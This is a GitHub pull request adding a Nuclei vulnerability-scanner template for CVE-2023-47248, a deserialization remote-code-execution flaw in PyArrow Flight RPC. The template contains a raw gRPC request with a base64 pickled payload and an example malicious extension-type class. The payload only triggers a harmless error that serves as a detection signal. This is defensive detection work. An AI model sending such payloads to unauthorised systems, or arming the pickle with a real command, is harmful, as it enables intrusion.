Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create CVE-2023-47248.yaml #11401

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
+68 −0
Open

Create CVE-2023-47248.yaml #11401

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
68 changes: 68 additions & 0 deletions http/cves/2023/CVE-2023-47248.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,68 @@
id: CVE-2023-47248

info:
name: PyArrow Flight RPC - Remote Code Execution
author: smolse
severity: critical
description: |
PyArrow Flight RPC from v0.14.0 through v14.0.0 allows remote attackers to execute arbitrary code via a maliciously crafted Python-defined extension type.
remediation: |
Upgrade to PyArrow v14.0.1 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-47248
- https://www.cve.org/CVERecord?id=CVE-2023-47248
- https://github.com/apache/arrow/commit/f14170976372436ec1d03a724d8d3f3925484ecf
- https://github.com/smolse/poc-or-gtfo/tree/main/CVE-2023-47248
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-47248
cwe-id: CWE-502
epss-score: 0.015960000
epss-percentile: 0.870280000
cpe: cpe:2.3:a:apache:pyarrow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: pyarrow
tags: cve,cve2023,rce,arrow,pyarrow,apache

http:
- raw:
- |
POST /arrow.flight.protocol.FlightService/DoPut HTTP/2
Host: {{Hostname}}
Content-Type: application/grpc
Te: trailers
Grpc-Accept-Encoding: identity, gzip, deflate

{{base64_decode("AAAAAS0KBAgBGgASpAIQAAAAAAAKAAwABgAFAAgACgAAAAABBAAMAAAACAAIAAAABAAIAAAABAAAAAEAAAAYAAAAAAASABgACAAGAAcADAAAABAAFAASAAAAAAABDxQAAADMAAAACAAAABAAAAAAAAAAAAAAAAAAAAACAAAAVAAAAAQAAAC8////CAAAACAAAAAUAAAAQVJST1c6ZXh0ZW5zaW9uOm5hbWUAAAAAFwAAAGFycm93LnB5X2V4dGVuc2lvbl90eXBlAAgADAAEAAgACAAAAAgAAAAkAAAAGAAAAEFSUk9XOmV4dGVuc2lvbjptZXRhZGF0YQAAAAAmAAAAgASVGwAAAAAAAACMCGJ1aWx0aW5zlIwHY29tcGxleJSTlClSlC4AAAQABAAEAAAA")}}

# The Base64 encoded payload in the request body is a serialized gRPC request to the "DoPut" method of the Arrow
# Flight RPC service. It contains a custom PyArrow extension type that, when deserialized, returns a complex number
# type object that expectedly doesn't have a "storage_type" attribute required by PyArrow and hence results in an
# exception being raised.
#
# Example malicious extension type class used in the request above:
# ```
# class MyType(pyarrow.PyExtensionType):
# def __init__(self):
# pyarrow.PyExtensionType.__init__(self, pa.binary(0))
#
# def __reduce__(self):
# return complex, ()
# ```
#
# By checking the response for the following error message in the "Grpc-Message" header, we can determine if the
# service is vulnerable to a remote code execution attack.
matchers-condition: and
matchers:
- type: word
words:
- "'complex' object has no attribute 'storage_type'"
part: header

- type: status
status:
- 200